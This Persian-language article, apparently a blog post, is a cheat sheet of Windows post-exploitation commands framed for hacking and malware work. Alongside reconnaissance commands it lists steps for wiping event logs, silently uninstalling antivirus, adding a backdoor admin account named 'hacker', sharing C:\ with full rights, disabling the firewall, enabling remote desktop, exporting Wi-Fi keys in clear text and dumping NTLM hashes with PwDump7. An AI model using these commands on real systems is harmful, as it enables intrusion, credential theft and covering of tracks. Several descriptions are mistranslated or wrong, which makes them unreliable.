دستورات مهم یک هکر برای بهره برداری از ویندوز
Exploitation یا بهره برداری یک برنامه یا اسکریپت برنامه ریزی شده است که می تواند هکرها را قادر به کنترل یک سیستم و بهره برداری از آسیب پذیری های آن کند. Windows Post Exploitation تکنیکی برای پیاده سازی اهداف مخرب یک هکر بر روی سیستم عامل ویندوزی قربانی میباشد. هکر با استفاده از این تکنیک میتواند فرایندهای زیر را انجام دهد:
- شناسایی تارگت ها (Understanding the victim)
- ارتقا سطح دسترسی (Privilege escalation)
- پاک کردن ردپا (Cleaning tracks and staying undetected)
- جمع آوری اطلاعات سیستم (Collecting system information and data)
- راه اندازی درب پشتی و روت کیت ها (Setting up backdooring and rootkits)
- دسترسی به زیر شبکه کلاینت ها (Pivoting to penetrate internal)
- و…
استفاده از این نوع تکنیک به دو صورت انجام میشود که اولی با استفاده از فریم ورک تست نفوذ متاسپلویت است که ماژولی مخصوص این کار دارد و قابل توسعه نیز میباشد. دومی نیز با استفاده از خط فرمان سیستم عامل انجام میگیرد. Post Exploitation در زمینه تست نفوذ (pentesting) و برنامه نویسی بدافزار (malware programing) به کار می رود.
در ادامه به بررسی برخی از دستورات مهم Windows Post Exploitation می پردازیم که در محیط cmd و پاورشل قابل اجرا میباشند. این دستورات به صورت زیر میباشند:
- Blind Files (مشاهده فایل ها، مسیریابی پوشه ها یا پرونده های اشتراکی از طریق smb,ftp,nfs و..)
- System (دستورات مرتبط با اطلاعات سیستم)
- (Networking (ipconfig, netstat, net (دستورات مرتبط با شبکه)
- Configs (دستورات مرتبط با پیکربندی سیستم عامل)
- Finding Important Files (دستوراتی برای پیدا کردن اطلاعات حساس از سیستم)
- Remote System Access ( دستوراتی برای دسترسی به سیستم از راه دور)
- Deleting Logs (دستوراتی در رابطه با حذف فایل های لاگ)
- (Uninstalling Software “AntiVirus” (Non interactive (دستوراتی در رابطه با حذف برنامه ها مانند انتی ویروس ها و…)
- Invasive or Altering Commands (دستوراتی برای ایجاد تغییرات در سیستم عامل)
- Third Party Portable Tools (ابزارهایی برای بهره برداری بیشتر)
مکان فایل های مهم Blind Files
| دستورات | توضیحات |
| tree C:\ /f /a > C:\output_of_tree.txt | یک لیست دایرکتوری را در قالب “درخت” چاپ می کند. آرگومان a باعث می شود که درختان با استفاده از نویسه های ASCII به جای موارد خاص چاپ شوند و آرگومان f نام فایل ها و همچنین پوشه ها را نشان می دهد. |
| dir /a | تمام پرونده ها را در یک دایرکتوری فهرست می کند که شامل فایل های پنهان و سیستمی نیز میشود. |
| dir /b /s [Directory or Filename] | شامل فهرست پرونده ها و دایرکتوری ها میباشد. |
| dir \ /s /b | find /I “searchstring” | |
| command | find /c /v “” | شمارش تمام خطوطی که برای “فرمان” استفاده می کنید. |
دستورات مرتبط با System
| دستورات | توضیحات |
| whoami | کاربر فعلی سیستم را نمایش میدهد. |
| whoami /all | کاربر فعلی را به همراه گروه و سطح دسترسی نشان میدهد. |
| set |
متغییر های محیطی را نشان میدهد. مانند: USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE. |
| fsutil fsinfo drives | درایو های فعلی سیستم را نشان میدهد. نیاز به دسترسی ادمین دارد. |
| reg query HKLM /s /d /f “C:\* *.exe” | find /I “C:\” | find /V “””” | کوئری های ایمن ثبت شده در رجیستری سیستم عامل ویندوز 7 را نشان میدهد. |
دستورات مرتبط با (Networking (ipconfig, netstat, net
| دستورات | توضیحات |
| ipconfig /all | اطلاعات کامل درباره NIC شما را نمایش می دهد. |
| ipconfig /displaydns | کش DNS محلی شما را نمایش می دهد. |
| netstat -nabo | لیست پورت ها / اتصالات با فرآیند متناظر (-b)، انجام ندادن (-n)، تمام اتصالات (-a) و مالکیت شناسه پردازش (-o) |
| netstat -r | جدول مسیریابی را نمایش می دهد. |
| netstat -na | findstr :445 | همه پورت ها و اتصالات مربوط به پورت 445 را پیدا کنید. |
| netstat -nao | findstr LISTENING | پیدا کردن تمام پورت های LISTENING و PID مربوط به آنها. |
| netstat -anob | findstr “services, process or port” | پرچم “b” فرمان را طولانی تر می کند اما نام پروسه را با استفاده از هر یک از اتصالات نمایش می دهد. |
| netsh diag show all | {XP only} اطلاعات مربوط به سرویس های شبکه و آداپتورها را نشان می دهد |
| net view | پرس و جو های (NBNS / SMB SAMBA) و تلاش برای پیدا کردن همه میزبان در گروه کاری یا دامنه فعلی شما. |
| net view /domain | لیست تمام دامنه های موجود میزبان |
| net view /domain:otherdomain | پرس و جوهای NBNS / SMB) SAMBA) و تلاش برای پیدا کردن همه میزبان در ‘otherdomain’ |
| net user %USERNAME% /domain | اطلاعاتی راجع به کاربر فعلی را نشان میدهد که جزو یک کاربر دامنه هستند. اگر شما یک کاربر محلی هستید پس شما فقط دامنه را رها می کنید. مهمترین چیزهایی که باید توجه داشته باشید عبارتند از زمان ورود، آخرین بار تغییر رمز عبور، اسکریپت های ورود به سیستم و عضویت در گروه. |
| net user /domain | همه کاربران دامنه را لیست می کند. |
| net accounts | سیاست رمز عبور برای سیستم محلی را چاپ می کند. |
| net accounts /domain | سیاست رمز عبور برای دامنه را چاپ می کند. |
| net localgroup administrators | اعضای گروه محلی Administrators را چاپ می کند. |
| net localgroup administrators /domain | برای استفاده از گروه و دامنه محلی فرض شده است. |
| net group “Domain Admins” /domain | اعضای گروه مدیران دامنه را چاپ می کند. |
| net group “Enterprise Admins” /domain | اعضای گروه مدیران اداری را چاپ می کند. |
| net group “Domain Controllers” /domain | لیست کنترل کننده ها را برای دامنه فعلی چاپ می کند. |
| net share | smb به اشتراک گذاشته شده شما را نمایش می دهد و مسیر (ها) آنها را نشان می دهد. |
| net session | find / “\\” | |
| arp -a | لیست تمام سیستم های موجود در جدول ARP دستگاه را نشان می دهد. |
| route print | جدول مسیریابی ماشین را چاپ می کند. این می تواند برای پیدا کردن شبکه های دیگر و مسیرهای استاتیک که در آن قرار داده شده است مفید باشد. |
| browstat (Not working on XP) | |
| netsh wlan show profiles | تمام پروفایل های بی سیم ذخیره شده را نشان می دهد. بعدا می توانید اطلاعات مربوط به این پروفایل را با دستور زیر وارد کنید. |
| netsh wlan export profile folder=. key=clear |
یک پروفایل کاربری wifi را با رمز عبور در متن ساده به یک فایل xml در دایرکتوری کاری فعلی صادر می کند. |
| netsh wlan [start|stop] hostednetwork | یک هات اسپات را استارت یا استاپ میکند. |
| netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary | تنظیم کامل شبکه میزبان برای ایجاد یک Backdoor بی سیم. |
| netsh wlan set hostednetwork mode=[allow|disallow] |
سرویس شبکه میزبان را فعال یا غیرفعال می کند. |
| wmic ntdomain list | اطلاعات مربوط به دامنه و کنترل کننده دامنه را بازیابی کنید. |
دستورات مرتبط با Configs
| دستورات | توضیحات |
| gpresult /z | خروجی متشکل از GPO) Group policy) و تنظیمات مربوط به سیستم فعلی و کاربر را نشان میدهد. |
| sc qc <servicename> |
تنظیمات سرویس را بررسی می کند. |
| sc query |
به تنهایی مورد استفاده قرار می گیرد و تمام سرویس ها نمایش داده می شوند. |
| sc queryex | اطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد. |
| type %WINDIR%\System32\drivers\etc\hosts | اطلاعات گسترده در مورد همه یا یک سرویس را نشان میدهد. |
| echo %COMSPEC% |
معمولا در cmd.exe در دایرکتوری ویندوز قرار می گیرند، اما خوب است که مطمئن شوید. |
| c:\windows\system32\gathernetworkinfo.vbs | ثبت نام رجیستری، پیکربندی فایروال، کش DNS، اسکریپت و غیره را داخل ویندوز۷ نشان میدهد. |
دستوراتی برای Remote System Access
| دستورات | توضیحات |
| net share \\computername | |
| tasklist /V /S computername | |
| qwinsta /SERVER:computername | |
| qprocess /SERVER:computername * | |
| net use \\computername | به شما اجازه می دهد تا به سیستم دوردست به عنوان کاربر فعلی دسترسی پیدا کنید |
| net use \\computername /user:DOMAIN\username password |
با استفاده از IPC $ mount، یک نام کاربری و رمز عبور به شما اجازه می دهد تا به دستورات دسترسی پیدا کنید که معمولا از نام کاربری و رمز عبور به عنوان کاربر دیگری در زمینه سیستم از راه دور درخواست نمی کنند. |
| reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f | فعال کردن سرویس دسترسی از راه دور. |
| reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
|
کمک از راه دور را فعال کنید. |
دستوراتی در رابطه با Deleting Logs
- wevtutil el (list logs)
- wevtutil cl <LogName> (Clear specific lowbadming)
- del %WINDIR%\*.log /a /s /q /f
دستوراتی در رابطه با Uninstalling Software
- wmic product get name /value (this gets software names)
- wmic product where name=”XXX” call uninstall /nointeractive (this uninstalls software)
دستوراتی برای ایجاد تغییرات در سیستم Invasive or Altering Commands
|
دستورات |
توضیحات |
| net user hacker hacker /add | یک کاربر جدید محلی با نام هکر و پسورد “هکر” ایجاد میکند. |
| net localgroup administrators /add hacker
or net localgroup administrators hacker /add |
کاربر “هکر” جدید را به گروه مدیران محلی اضافه می کند. |
| net share nothing$=C:\ /grant:hacker,FULL /unlimited |
درایو C (یا هر درایو دیگر) به عنوان سهم ویندوز به اشتراک میگذارد. و حقوق کامل کاربر هکر را برای دسترسی یا تغییر هر چیزی در آن درایو به شما ارائه می دهد. |
| net user username /active:yes /domain | یک حساب کاربری غیر فعال / غیر فعال را فعال می کند. |
| netsh firewall set opmode disable | فایروال ویندوز را غیرفعال می کند. |
| netsh firewall set opmode enable | فایروال ویندوز را فعال می کند. |
ابزارهایی برای بهره برداری بیشتر Third Party Portable Tools
| دستورات | برنامه های مرتبط | توضیحات |
| carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump | http://h.ackack.net/carrot-exe.html | بازگرداندن تنظیمات متداول فایروال setupnetsh opmode را غیر فعال می کند. |
| PwDump7.exe > ntlm.txt | http://www.tarasco.org/security/pwdump_7/ | هش های ویندوز NTLM را پاک می کند. |
مطالب مرتبط:
